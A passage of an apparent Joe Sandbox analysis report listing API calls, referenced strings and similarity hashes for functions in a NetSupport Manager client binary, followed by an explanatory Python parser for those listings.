                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 180989782-0
                                                                                        • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                        • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                        • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                        • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                        • _strrchr.LIBCMT ref: 1114315A
                                                                                        • _strrchr.LIBCMT ref: 1114316A
                                                                                        • wsprintfA.USER32 ref: 11143185
                                                                                          • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                        • String ID: SHV
                                                                                        • API String ID: 2529650285-722696247
                                                                                        • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                        • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                        • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                        • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,00001002,?,00000000), ref: 11014142
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        • m_hWnd, xrefs: 11014126
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014121
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                        • API String ID: 819365019-3966830984
                                                                                        • Opcode ID: f088c587b30f06de9e97c7295ecad2ca59e989c08ba0d6fbfe08a9c69469adba
                                                                                        • Instruction ID: 8b3d7ba69e5a145072af1ccd44eaaa1231f9c6ae13f618dfcc42dde169188c16
                                                                                        • Opcode Fuzzy Hash: f088c587b30f06de9e97c7295ecad2ca59e989c08ba0d6fbfe08a9c69469adba
                                                                                        • Instruction Fuzzy Hash: E1E02B3574031DBBD320DA91EC06FD2F38C9B14764F044435FA245B284DAB0F880C3A4
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                        • m_hWnd, xrefs: 11001126
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1604732272-2830328467
                                                                                        • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                        • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                        • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                        • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
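The function blocks above are the report's IDA-plugin listing: for each function, the APIs it calls (with the arguments the disassembler resolved, plus calls reported from subcalls), the strings it references, and the Similarity identifiers. As an added example that is not part of the Joe Sandbox report and not code from the analysed binary, the following Python parses that layout into records, so one can ask which blocks reach MessageBoxA and ExitProcess together (the GetLastError/wsprintfA/MessageBoxA/ExitProcess helper at 11029450 that the listview.h and wndclass.h blocks call), which string literals are passed as call arguments (NSMTRACE, Client32), and which build paths the string table carries (e:\nsmsrc\...). SAMPLE is a constructed two-block excerpt in the report's layout; the section names, the bullet character and the "Instruction Fuzzy Hash" line used as the block terminator are taken from this page. The rule that an 8-hex-digit argument is an immediate or pointer rather than a string literal is an assumption of this example.

```python
"""Parse Joe Sandbox IDA-plugin function blocks (APIs/Strings/Similarity listings as
in this report) into queryable records. Added example, not Joe Sandbox code; SAMPLE is a constructed excerpt."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = r"""APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
• _strrchr.LIBCMT ref: 1114315A
• wsprintfA.USER32 ref: 11143185
  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
Strings
Similarity
• String ID: SHV
• Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
• Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
APIs
• SendMessageA.USER32(?,00001002,?,00000000), ref: 11014142
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• m_hWnd, xrefs: 11014126
• e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014121
Similarity
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
• Instruction ID: 8b3d7ba69e5a145072af1ccd44eaaa1231f9c6ae13f618dfcc42dde169188c16
• Instruction Fuzzy Hash: E1E02B3574031DBBD320DA91EC06FD2F38C9B14764F044435FA245B284DAB0F880C3A4
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<callee>[0-9A-Fa-f]+): (?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")   # assumption: immediate or pointer argument, not a string literal
PATH_RE = re.compile(r"^[A-Za-z]:\\")     # drive-letter build path left in the binary

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    via_subcall: Optional[str] = None   # callee address when reported from a subcall

@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    strings: dict[str, str] = field(default_factory=dict)     # text -> xref address
    similarity: dict[str, str] = field(default_factory=dict)  # "Instruction ID" etc.

def _parse_api(item: str) -> Optional[ApiCall]:
    via, m = None, SUBCALL_RE.match(item)
    if m:
        via, item = m["callee"], m["rest"]
    m = API_RE.match(item)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    return ApiCall(m["name"], m["module"], args, m["ref"], via)

def parse_blocks(text: str) -> list[FunctionBlock]:
    """One FunctionBlock per 'APIs ... Instruction Fuzzy Hash' run of lines."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif line.startswith("•"):          # any other text (e.g. link residue) is ignored
            item = line.lstrip("•").strip()
            if section == "APIs":
                call = _parse_api(item)
                if call:
                    cur.calls.append(call)
            elif section == "Strings" and (m := STRING_RE.match(item)):
                cur.strings[m["text"]] = m["ref"]
            elif section == "Similarity" and (m := KV_RE.match(item)):
                cur.similarity[m["key"]] = m["value"]
                if m["key"] == "Instruction Fuzzy Hash":   # last line of every block
                    blocks.append(cur)
                    cur = FunctionBlock()
    return blocks

def literal_args(block: FunctionBlock) -> list[str]:
    """String literals resolved as call arguments: anything that is not '?' or an
    8-digit hex value (an ASCII literal that is exactly 8 hex chars would be missed)."""
    out: list[str] = []
    for c in block.calls:
        out += [a for a in c.args if a != "?" and not HEX8.match(a) and a not in out]
    return out

def source_paths(block: FunctionBlock) -> list[str]:
    """Drive-letter build paths in the string table (the e: paths in this report)."""
    return [s for s in block.strings if PATH_RE.match(s)]

def reaches(block: FunctionBlock, *names: str) -> bool:
    """True if every named API occurs in the block, directly or via a subcall."""
    return set(names) <= {c.name for c in block.calls}
```

Feed parse_blocks() the text of a whole report rather than SAMPLE to index every function: blocks for which reaches(b, "MessageBoxA", "ExitProcess") holds are the call sites of the 11029450 helper, literal_args() surfaces strings such as NSMTRACE and Client32 that the API-ID line does not show, and source_paths() collects the build paths for comparison against other samples.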